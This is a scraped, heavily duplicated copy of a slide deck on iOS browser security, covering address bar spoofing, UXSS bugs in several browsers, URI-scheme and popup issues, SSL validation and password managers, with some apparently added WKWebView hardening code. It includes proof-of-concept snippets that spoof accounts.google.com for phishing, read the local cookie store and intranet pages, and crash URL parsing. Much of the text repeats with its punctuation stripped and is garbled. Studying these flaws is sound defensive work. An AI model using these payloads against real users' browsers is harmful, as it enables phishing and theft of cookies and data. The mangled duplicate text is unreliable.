SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 23: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/23.jpg)
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing: Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts

Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function(){ location = 'https://accounts.google.com:8443' }, …)

Address Bar Spoofing: Phishing page in the title bar
<title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock makes sense only if there was an actual successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding an SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
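The address bar tips above, put together for WKWebView on iOS 8 as an added example (not code from the slides or from any of the browsers discussed): the bar is driven only by WebKit's own KVO-compliant URL and hasOnlySecureContent state, failed navigations refresh it too, and the lock is hidden while a load is still pending. AddressBarController, urlLabel and lockIcon are assumed names.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Hypothetical controller that owns the address bar of one browser tab.
static void *kAddressBarContext = &kAddressBarContext;

@interface AddressBarController : NSObject <WKNavigationDelegate>
@property (nonatomic, strong) WKWebView *webView;
@property (nonatomic, strong) UILabel *urlLabel;      // assumed address bar label
@property (nonatomic, strong) UIImageView *lockIcon;  // assumed SSL lock indicator
@property (nonatomic, assign) BOOL lastLoadFailed;
@end

@implementation AddressBarController

- (instancetype)initWithWebView:(WKWebView *)webView
                       urlLabel:(UILabel *)urlLabel
                       lockIcon:(UIImageView *)lockIcon {
    if ((self = [super init])) {
        _webView = webView;
        _urlLabel = urlLabel;
        _lockIcon = lockIcon;
        webView.navigationDelegate = self;
        // URL and hasOnlySecureContent are KVO-compliant on WKWebView (iOS 8):
        // observe them instead of remembering the URL passed to loadRequest:.
        [webView addObserver:self forKeyPath:@"URL"
                     options:NSKeyValueObservingOptionNew context:kAddressBarContext];
        [webView addObserver:self forKeyPath:@"hasOnlySecureContent"
                     options:NSKeyValueObservingOptionNew context:kAddressBarContext];
    }
    return self;
}

- (void)dealloc {
    [_webView removeObserver:self forKeyPath:@"URL" context:kAddressBarContext];
    [_webView removeObserver:self forKeyPath:@"hasOnlySecureContent" context:kAddressBarContext];
}

- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context {
    if (context != kAddressBarContext) {
        [super observeValueForKeyPath:keyPath ofObject:object change:change context:context];
        return;
    }
    [self refresh];
}

// One source of truth: what WebKit reports. Never document.title, never the URL
// the app asked for, and never a lock derived from the "https" prefix alone.
- (void)refresh {
    NSURL *current = self.webView.URL;
    self.urlLabel.text = current.absoluteString ?: @"";

    BOOL secure = current != nil
        && [current.scheme caseInsensitiveCompare:@"https"] == NSOrderedSame
        && self.webView.hasOnlySecureContent   // whole document came over https
        && !self.webView.loading               // nothing pending (cf. the loading loop)
        && !self.lastLoadFailed;
    self.lockIcon.hidden = !secure;
}

- (void)webView:(WKWebView *)webView didCommitNavigation:(WKNavigation *)navigation {
    self.lastLoadFailed = NO;
    [self refresh];
}

- (void)webView:(WKWebView *)webView didFinishNavigation:(WKNavigation *)navigation {
    [self refresh];
}

// Failed navigations update the bar as well (the UIWebViewDelegate equivalent is
// webView:didFailLoadWithError:). NXDOMAIN, closed ports and TLS errors all land here.
- (void)webView:(WKWebView *)webView didFailProvisionalNavigation:(WKNavigation *)navigation
      withError:(NSError *)error {
    self.lastLoadFailed = YES;
    [self refresh];
}

- (void)webView:(WKWebView *)webView didFailNavigation:(WKNavigation *)navigation
      withError:(NSError *)error {
    self.lastLoadFailed = YES;
    [self refresh];
}

// Certificate validation stays with the system. Answering this challenge with a
// credential built from challenge.protectionSpace.serverTrust is how self-signed
// certificates end up accepted silently.
- (void)webView:(WKWebView *)webView
didReceiveAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge
completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential *))completionHandler {
    completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
}

@end
```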
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
  → bridge call: mb.exec$(WINDOW_ID)[ {command: "window.open", target: 1234, url: "about:blank"} ]  (target generated with Math.random())
  → [webView loadRequest: … "about:blank" …]
  (cross-frame forgery)
w.document.write('Hi')
  → bridge call: mb.exec$(WINDOW_ID)[ {command: "window.document.write", target: 1234, html: "Hi"} ]
  → [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads an applewebdata:// origin. Same as file:// - no same-origin policy; access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') → applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:[NSURL … "about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to an applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] → nil (URLWithString: returns nil for a string that is not a valid URL)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) → NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename ending in .html

JS without Same-Origin Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
path = path + '/Library/Cookies/Cookies.binarycookies';
x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);
</script>

<script>
x = new XMLHttpRequest(); x.open('GET', 'https://yourintranet', false); x.send(); alert(x.responseText);
</script>

Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView.configuration.preferences.javaScriptEnabled = false
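The "Opening local HTML files safely" list above, implemented for WKWebView on iOS 8 as an added example (not code from the slides): script is disabled in the configuration, the document is loaded with an explicit about:blank base URL whose parse result is checked rather than assumed (a nil baseURL is the applewebdata:// case), and "open as text/plain" is done by escaping the file into a <pre> block. The CSP/sandbox bullet is not covered here. LocalFileViewer and EscapeHTML are assumed names.

```objective-c
#import <WebKit/WebKit.h>

// Hypothetical viewer for HTML files the browser has downloaded.
@interface LocalFileViewer : NSObject
@property (nonatomic, strong, readonly) WKWebView *webView;
- (BOOL)openFileAtPath:(NSString *)path renderAsHTML:(BOOL)renderAsHTML error:(NSError **)error;
@end

// Escape so that a file shown "as text/plain" is rendered as text, never parsed as markup.
static NSString *EscapeHTML(NSString *text) {
    NSMutableString *out = [text mutableCopy];
    [out replaceOccurrencesOfString:@"&" withString:@"&amp;" options:0 range:NSMakeRange(0, out.length)];
    [out replaceOccurrencesOfString:@"<" withString:@"&lt;" options:0 range:NSMakeRange(0, out.length)];
    [out replaceOccurrencesOfString:@">" withString:@"&gt;" options:0 range:NSMakeRange(0, out.length)];
    return out;
}

@implementation LocalFileViewer

- (instancetype)init {
    if ((self = [super init])) {
        WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
        // Slide: iOS 8, WKWebView.configuration.preferences.javaScriptEnabled = false.
        // A local document that cannot run script cannot use a file:// or
        // applewebdata:// origin to read cookie files or the intranet.
        config.preferences.javaScriptEnabled = NO;
        _webView = [[WKWebView alloc] initWithFrame:CGRectZero configuration:config];
    }
    return self;
}

- (BOOL)openFileAtPath:(NSString *)path renderAsHTML:(BOOL)renderAsHTML error:(NSError **)error {
    NSData *data = [NSData dataWithContentsOfFile:path options:0 error:error];
    if (data == nil) {
        return NO;
    }
    NSString *text = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
    if (text == nil) {
        // Not valid UTF-8: decode as Latin-1 (every byte maps) instead of guessing.
        text = [[NSString alloc] initWithData:data encoding:NSISOLatin1StringEncoding];
    }

    // Slide: baseURL = about:blank. Never pass nil here; with UIWebView that meant
    // an applewebdata:// origin. URLWithString: returns nil for malformed input,
    // so the result is checked rather than assumed.
    NSURL *blank = [NSURL URLWithString:@"about:blank"];
    if (blank == nil) {
        if (error) {
            *error = [NSError errorWithDomain:NSURLErrorDomain code:NSURLErrorBadURL userInfo:nil];
        }
        return NO;
    }

    NSString *html = renderAsHTML
        ? text                                                           // markup, script off
        : [NSString stringWithFormat:@"<pre>%@</pre>", EscapeHTML(text)]; // "open as text/plain"
    [self.webView loadHTMLString:html baseURL:blank];
    return YES;
}

@end
```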
Popups & URL handling
Popup blockers
• Browsers that rewrite href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal)
• Registered (external)
Examples:
• scheme://download/https://secure.tld/victim/data vs. scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
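The popup and URI-scheme handling above, together with the "Safe cross-tab document.write" advice from the UXSS section, as an added example for WKWebView on iOS 8 (not code from the slides or from any of the browsers named): window.open() children are created by WebKit through the UIDelegate callback rather than through a JSON bridge, so the same-origin policy applies to them; every navigation, including an iframe's src, is decided in decidePolicyForNavigationAction:, where a nil URL is refused before it can reach any CFURL/NSURL helper and non-web schemes are only handed to the system on a user-activated main-frame link. TabManager and externalSchemes are assumed names.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Hypothetical tab manager shared by all tabs of the browser.
@interface TabManager : NSObject <WKUIDelegate, WKNavigationDelegate>
@property (nonatomic, strong) NSMutableArray<WKWebView *> *tabs;
@property (nonatomic, copy) NSSet<NSString *> *externalSchemes;  // assumed allow-list
- (WKWebView *)newTabWithConfiguration:(WKWebViewConfiguration *)configuration;
@end

@implementation TabManager

- (instancetype)init {
    if ((self = [super init])) {
        _tabs = [NSMutableArray array];
        _externalSchemes = [NSSet setWithArray:@[@"tel", @"mailto"]];
    }
    return self;
}

- (WKWebView *)newTabWithConfiguration:(WKWebViewConfiguration *)configuration {
    WKWebView *tab = [[WKWebView alloc] initWithFrame:CGRectZero configuration:configuration];
    tab.UIDelegate = self;
    tab.navigationDelegate = self;
    [self.tabs addObject:tab];
    return tab;
}

// window.open(): WebKit asks the app for a view, which must be built from the
// configuration WebKit hands over. The child stays a real WebKit window, so the
// same-origin policy applies to it; there is no bridge command and no
// loadHTMLString: with a guessed baseURL for the app to get wrong.
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    // Popup blocking on the engine's own notion of user activation, not on
    // rewritten href attributes. Returning nil cancels the popup.
    if (navigationAction.navigationType != WKNavigationTypeLinkActivated) {
        return nil;
    }
    return [self newTabWithConfiguration:configuration];
}

// Every navigation, including <iframe src="scheme://..."> and script-driven
// redirects, is decided here before anything touches NSURL/CFURL helpers.
- (void)webView:(WKWebView *)webView
decidePolicyForNavigationAction:(WKNavigationAction *)navigationAction
        decisionHandler:(void (^)(WKNavigationActionPolicy))decisionHandler {
    NSURL *url = navigationAction.request.URL;
    NSString *scheme = url.scheme.lowercaseString;
    // nil means the string did not parse as a URL: the CFURL NULL-argument case.
    if (url == nil || scheme == nil) {
        decisionHandler(WKNavigationActionPolicyCancel);
        return;
    }
    // targetFrame is nil for a navigation that opens a new window.
    BOOL mainFrame = navigationAction.targetFrame == nil || navigationAction.targetFrame.mainFrame;
    BOOL userClick = navigationAction.navigationType == WKNavigationTypeLinkActivated;

    if ([scheme isEqualToString:@"http"] || [scheme isEqualToString:@"https"]
        || [scheme isEqualToString:@"about"]) {
        decisionHandler(WKNavigationActionPolicyAllow);
        return;
    }
    if ([scheme isEqualToString:@"data"] && !mainFrame) {
        // data: in a subframe is fine; in the main frame it is untracked content
        // sitting behind whatever the address bar last showed.
        decisionHandler(WKNavigationActionPolicyAllow);
        return;
    }
    if ([self.externalSchemes containsObject:scheme] && userClick && mainFrame) {
        // Hand a user-activated link to the system; iframe src and redirects never get here.
        // openURL: is the iOS 8 API; newer SDKs use openURL:options:completionHandler:.
        [[UIApplication sharedApplication] openURL:url];
    }
    // WebKit itself never navigates to a non-web scheme.
    decisionHandler(WKNavigationActionPolicyCancel);
}

@end
```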
SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://ios.browsr-tests.com

Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 24: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/24.jpg)
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
